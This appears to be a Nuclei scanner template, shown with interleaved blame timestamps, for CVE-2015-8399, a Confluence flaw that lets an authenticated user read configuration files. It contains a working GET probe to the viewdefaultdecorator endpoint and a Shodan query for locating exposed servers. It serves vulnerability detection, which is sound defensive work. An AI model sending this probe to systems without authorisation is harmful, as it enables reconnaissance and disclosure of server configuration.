2021-04-06 19:37:06 +00:00
id : CVE-2015-8399
2022-03-19 10:42:08 +00:00
2021-04-06 19:37:06 +00:00
info :
2022-10-10 19:22:59 +00:00
name : Atlassian Confluence <5.8.17 - Information Disclosure
2022-04-22 10:38:41 +00:00
author : princechaddha
2021-04-06 19:37:06 +00:00
severity : medium
2022-10-10 19:22:59 +00:00
description : Atlassian Confluence before 5.8.17 contains an information disclsoure vulnerability. A remote authenticated user can read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.
2022-04-22 10:38:41 +00:00
reference :
- https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro
2022-05-17 09:18:12 +00:00
- https://www.exploit-db.com/exploits/39170/
2022-10-10 19:22:59 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2015-8399
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 4.3
2021-09-10 11:26:40 +00:00
cve-id : CVE-2015-8399
cwe-id : CWE-200
2023-07-11 19:49:27 +00:00
epss-score : 0.9647
cpe : cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*
2022-03-19 10:42:08 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-03-19 10:42:08 +00:00
shodan-query : http.component:"Atlassian Confluence"
2023-07-11 19:49:27 +00:00
vendor : atlassian
product : confluence
2022-08-27 04:41:18 +00:00
tags : edb,cve,cve2015,atlassian,confluence
2021-04-06 19:37:06 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-04-06 19:37:06 +00:00
- method : GET
path :
- "{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName"
2022-03-19 10:42:08 +00:00
2021-04-06 19:37:06 +00:00
matchers-condition : and
matchers :
- type : word
2022-03-19 10:42:08 +00:00
part : body
2021-04-06 19:37:06 +00:00
words :
- "confluence-init.properties"
- "View Default Decorator"
condition : and
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200